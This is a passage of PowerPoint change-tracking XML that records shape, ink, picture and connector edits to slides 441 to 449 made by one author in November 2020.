          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:46:04.896" v="8046"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="55" creationId="{BB655C1C-D413-4D95-B6EA-DD2A5B9A9324}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:46:04.193" v="8043"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:grpSpMk id="58" creationId="{4230929A-7E9E-4568-83BD-D4D692D03677}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add 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81" creationId="{BFAB586D-72EF-470E-A89D-91EC7E4C022C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90" creationId="{B825D0CE-8EE1-413E-A7B6-EFCBED9287CB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99" creationId="{92D00B66-3C9C-4F21-9A79-2112801EDF94}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:42:03.998" v="7961" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:picMk id="161" creationId="{650E71EB-FD4C-4EE0-943A-FB4FB1782AE7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:03.664" v="8000" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="2" creationId="{247452F0-FD1C-4CB2-A7AC-B6114CAA4468}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:43:58.233" v="7997"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="3" creationId="{DDEA91FF-3EDE-4CD4-B90F-6E12EA320CC7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:02.972" v="7999" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="5" creationId="{398A9F04-FF70-4728-8787-D16B344DC87D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:29.980" v="8012" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="9" creationId="{50B04AA1-BE6F-47E3-A1E9-320002A498FD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:29.635" v="8011" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="10" creationId="{5BE54AE8-55F3-415E-92FB-38D60BF13F80}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:29.322" v="8010" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="11" creationId="{F89A67C7-1B40-4C5B-9BDE-503E6FF00D56}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:29.026" v="8009" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="12" creationId="{A4810D00-8DC1-4B17-AF6C-18C2486F3B13}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:28.697" v="8008"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="13" creationId="{169AC163-0A41-4E93-9468-F978421C53A1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:34.784" v="8014" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="15" creationId="{4DF254B5-165D-42AA-9023-E8EEC10936AD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:38.377" v="8019"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="16" creationId="{8D8262F9-FC33-4F03-98D7-10E0DE8BE2BA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:38.377" v="8019"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="17" creationId="{D95927ED-F5E4-4216-B6B0-DDE4B5D246DF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:42.507" v="8021" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="19" creationId="{E157E569-3E32-42C0-90F3-D150E970E7B4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:44:46.604" v="8023" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="20" creationId="{42FF5102-A019-4C0B-9FD3-A3F10E518BCD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:45:06.149" v="8025" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="47" creationId="{5AEF9524-6C92-4025-A77E-E4C2FBC3B20D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:45:15.555" v="8029" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="48" creationId="{1BAFDBC6-5721-4B7C-9253-285530B90E44}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:45:14.499" v="8028" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="49" creationId="{BBD39BC6-8A74-46D8-B3F4-804BE99BED13}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:45:20.169" v="8031" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="50" creationId="{1445C11B-9594-4D19-AD73-59BA76A13E7A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:45:22.704" v="8033" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="51" creationId="{8FB7F917-D4A6-4A54-81F0-62BB6F1CF84E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:45:30.040" v="8035" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="52" creationId="{C01495C5-5065-405E-8A73-E0C2BF0E2801}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:46:05.248" v="8047" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="53" creationId="{04EBD498-177C-4B4C-AA4F-7A7BBDCDA9BE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:46:04.896" v="8046"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="54" creationId="{E5189D1D-E349-4081-9C62-591C460370B1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:46:04.545" v="8044" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="56" creationId="{E5D84567-4541-48D5-B77E-9422967A31B4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:46:04.193" v="8043"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:inkMk id="57" creationId="{351A1B60-12D2-4A71-8BA3-9538B434D424}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:46:45.039" v="8050" actId="1582"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:cxnSpMk id="61" creationId="{4009698C-E8AF-4CD9-A12F-A6CF49FD3F24}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:49:20.677" v="8082" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:cxnSpMk id="164" creationId="{A15215E6-D52A-4822-AE03-F3199613A06C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T17:48:18.557" v="8074" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="283222430" sldId="441"/>
            <ac:cxnSpMk id="166" creationId="{A7E277E2-3F3B-4421-A660-AC8322371887}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="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1547514853" sldId="442"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:08:30.977" v="8176" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1547514853" sldId="442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2700238070" sldId="442"/>
        </pc:sldMkLst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864901960" sldId="443"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="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1525014257" sldId="443"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:08:36.086" v="8178" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1525014257" sldId="443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58:22.462" v="11326" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="480636073" sldId="444"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:08:52.015" v="8183" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="480636073" sldId="444"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29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2T21:15:39.530" v="10234" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1976344167" sldId="445"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:12:28.267" v="8220" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1976344167" sldId="445"/>
            <ac:spMk id="2" creationId="{F951BA67-7CCC-4CB6-BC57-DBCFDBFB323D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T21:15:39.530" v="10234" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1976344167" sldId="445"/>
            <ac:spMk id="6" creationId="{76FBAC7F-16BB-43BB-B6E3-E4D9CDACECA1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:12:25.289" v="8219" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1976344167" sldId="445"/>
            <ac:graphicFrameMk id="4" creationId="{F4DD9397-F236-46DB-BC99-76B2C47C11B2}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:12:21.311" v="8217" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2224965834" sldId="446"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:12:21.311" v="8217" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2224965834" sldId="446"/>
            <ac:spMk id="2" creationId="{F951BA67-7CCC-4CB6-BC57-DBCFDBFB323D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:12:18.537" v="8216" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2224965834" sldId="446"/>
            <ac:graphicFrameMk id="4" creationId="{F4DD9397-F236-46DB-BC99-76B2C47C11B2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1T18:12:38.960" v="8235" actId="1037"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3719103758" sldId="447"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:12:38.960" v="8235" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3719103758" sldId="447"/>
            <ac:spMk id="2" creationId="{F951BA67-7CCC-4CB6-BC57-DBCFDBFB323D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:11:24.114" v="8204" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3719103758" sldId="447"/>
            <ac:spMk id="6" creationId="{76FBAC7F-16BB-43BB-B6E3-E4D9CDACECA1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:11:21.894" v="8203" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3719103758" sldId="447"/>
            <ac:spMk id="7" creationId="{4E6F1678-554D-4F61-8A35-A5DFE889886C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:12:32.079" v="8222" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3719103758" sldId="447"/>
            <ac:graphicFrameMk id="4" creationId="{F4DD9397-F236-46DB-BC99-76B2C47C11B2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1T18:13:12.407" v="8250" actId="1037"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2625760957" sldId="448"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:13:12.407" v="8250" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625760957" sldId="448"/>
            <ac:spMk id="2" creationId="{F951BA67-7CCC-4CB6-BC57-DBCFDBFB323D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:13:01.384" v="8241" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625760957" sldId="448"/>
            <ac:spMk id="6" creationId="{76FBAC7F-16BB-43BB-B6E3-E4D9CDACECA1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:11:39.700" v="8209" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625760957" sldId="448"/>
            <ac:spMk id="8" creationId="{E4F77692-1E02-404F-9D01-6A7C8F77CE4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:12:44.777" v="8237" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625760957" sldId="448"/>
            <ac:graphicFrameMk id="4" creationId="{F4DD9397-F236-46DB-BC99-76B2C47C11B2}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme modAnim chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:17:50.238" v="10722"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2681269238" sldId="449"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:34:25.631" v="8790" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="2" creationId="{641199A4-DBBE-4FC8-8191-A56EFC0E20E0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:04:49.801" v="8434" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="3" creationId="{47A67D84-E2E2-4BBD-994B-301DC86B3985}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:06:02.466" v="8481" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="5" creationId="{5DBAAFDF-7358-41AE-872D-6BA75EACB02A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:06:02.466" v="8481" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="7" creationId="{67E358CD-E5C9-4776-B994-1F375DE65E2B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:10:19.330" v="8659" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="10" creationId="{8BE12CAE-774C-4EE6-B459-16CC21E6A446}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:10:03.017" v="8655" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="11" creationId="{787E79D1-A652-4E15-B872-0F9691D5050B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:13:41.120" v="8704" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="17" creationId="{6AF5932F-82A1-4BD6-89FD-6048480F8273}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:10:22.204" v="8661" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:picMk id="4" creationId="{0F754F1F-6F67-4002-884D-423F226FFB73}"/>
          </ac:picMkLst>
        </pc:picChg>
